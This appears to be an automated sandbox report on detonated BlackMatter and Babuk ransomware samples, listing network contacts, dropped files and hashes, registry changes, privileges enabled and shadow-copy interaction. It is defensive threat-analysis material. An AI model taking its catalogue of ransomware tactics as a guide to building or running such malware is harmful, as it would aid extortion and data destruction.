US	8.8.8.8:53	35.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	110.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	33.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	71.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	37.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	106.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	104.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	41.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	98.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	60.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	62.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	96.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	64.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	7.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	92.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	11.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	90.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	9.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	15.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	86.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	84.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	17.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	82.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	19.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	80.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	21.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	72.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	23.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	70.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	27.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	68.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	66.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	31.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	58.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	46.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	14.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	12.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	8.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	6.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	108.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	88.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	78.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	76.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	56.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	54.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	50.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	48.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	44.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	42.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	40.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	38.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	36.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	34.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	120.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	115.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	125.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	107.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	103.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	123.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	128.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	116.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	114.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	87.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	112.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	83.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	102.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	75.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	100.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	73.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	94.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	63.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	57.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	47.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	79.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	122.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	117.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	111.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	91.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	89.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	105.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	109.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	99.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	113.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	101.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	95.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	93.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	124.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	77.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	81.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	85.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	97.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	126.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	134.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	148.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	205.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	170.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	203.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	168.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	201.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	160.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	169.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	150.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	132.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	165.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	129.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	139.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	207.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	180.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	136.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	161.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	178.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	217.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	176.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	215.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	213.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	174.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	199.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	197.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	172.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	166.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	195.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	164.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	193.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	158.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	191.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	156.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	189.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	154.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	183.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	152.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	187.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	146.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	144.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	185.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	142.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	181.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	140.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	179.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	130.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	138.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	177.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	162.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	175.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	173.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	171.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	167.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	157.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	155.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	153.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	149.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	147.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	145.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	133.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	151.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	131.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	143.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	141.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	137.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	135.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	211.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	209.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	163.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	159.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	229.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	192.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	247.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	188.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	186.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	245.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	190.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	237.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	184.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	235.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	233.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	231.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	227.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	225.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	223.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	239.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	221.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	219.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	249.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	210.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	222.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	251.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	253.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	228.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	234.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	232.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	240.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	248.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	246.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	194.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	196.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	198.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	200.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	202.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	204.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	206.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	214.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	218.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	220.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	224.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	226.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	238.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	230.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	250.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	236.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	244.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	252.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	182.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	243.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	216.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	241.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	242.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	254.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	212.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	208.0.127.10.in-addr.arpa	udp
US	76.223.54.146:443	catsdegree.com	tcp

Files

memory/2556-0-0x0000000000B60000-0x0000000000B77000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4971.tmp

MD5	49aebf8cbd62d92ac215b2923fb1b9f5
SHA1	1723be06719828dda65ad804298d0431f6aff976
SHA256	b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512	bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar49A3.tmp

MD5	4ea6026cf93ec6338144661bf1202cd1
SHA1	a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256	8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512	6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2592-40-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmp

memory/2592-41-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/2592-42-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2592-43-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-44-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-45-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-46-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2592-47-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2556-48-0x0000000000B60000-0x0000000000B77000-memory.dmp

memory/2592-49-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5	9d57aee5a20d538519285afa6bfe2a47
SHA1	264bf62f85431714c4ad638108b75826d11b5162
SHA256	a469c660dfc226d2ab1ed8520f63bc5d187948b58cc39ebe63ea00a45a7cff1f
SHA512	b8671a43a2498dbb709dea7d3e333aa8eb7de9cdd6573e6fb56ead6ae3f4f010e27ca49baa1a1a41968a787b197a16c997b1d7304e66e7ffabfd64082598e8f2

C:\Users\Admin\README.b77a682a.TXT

MD5	f418a249405444da33cc73b402a26306
SHA1	1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256	b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512	b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/2556-244-0x0000000000B60000-0x0000000000B77000-memory.dmp

memory/2556-245-0x0000000000B60000-0x0000000000B77000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	d9ed20126a7ce73632e80090dfa6d744
SHA1	ccb251335adc910eb7437b8e83e3c216b053df37
SHA256	566d47d224ff248be4e94d66df0934167dda7fd129228ec13a19bf9b4713731c
SHA512	3609267c3fe69642e59527f67c38369793365943777715f07a66aaacd1e5a30c91fefce66106afe0ed996ce5677a694b3ae58c058ba924205507896b3c146d1a

memory/2556-284-0x0000000000B60000-0x0000000000B77000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (163) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\mINyMTFyg.bmp"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\mINyMTFyg.bmp"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\International	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\WallpaperStyle = "10"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: 36	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeImpersonatePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	paymenthacks.com	udp
US	204.11.56.48:443	paymenthacks.com	tcp
US	204.11.56.48:80	paymenthacks.com	tcp
US	8.8.8.8:53	mojobiden.com	udp
US	3.33.130.190:443	mojobiden.com	tcp
US	3.33.130.190:80	mojobiden.com	tcp
US	204.11.56.48:443	paymenthacks.com	tcp
US	204.11.56.48:80	paymenthacks.com	tcp
US	3.33.130.190:443	mojobiden.com	tcp
US	3.33.130.190:80	mojobiden.com	tcp

Files

memory/2112-0-0x0000000000AA0000-0x0000000000AE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabFD26.tmp

MD5	49aebf8cbd62d92ac215b2923fb1b9f5
SHA1	1723be06719828dda65ad804298d0431f6aff976
SHA256	b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512	bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarFF3B.tmp

MD5	4ea6026cf93ec6338144661bf1202cd1
SHA1	a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256	8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512	6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\mINyMTFyg.README.txt

MD5	f66968c47a64569e2281f65a95991be0
SHA1	ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256	4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512	cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

126s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (171) files with added filename extension

ransomware

Checks computer location settings

Description	Indicator	Process	Target
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\O:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\P:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\A:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\J:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\L:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\N:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\E:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\I:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\S:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\H:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\V:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\T:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\Y:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\U:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\G:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\K:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\Z:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\M:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\R:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\W:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\X:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\B:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\Q:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A
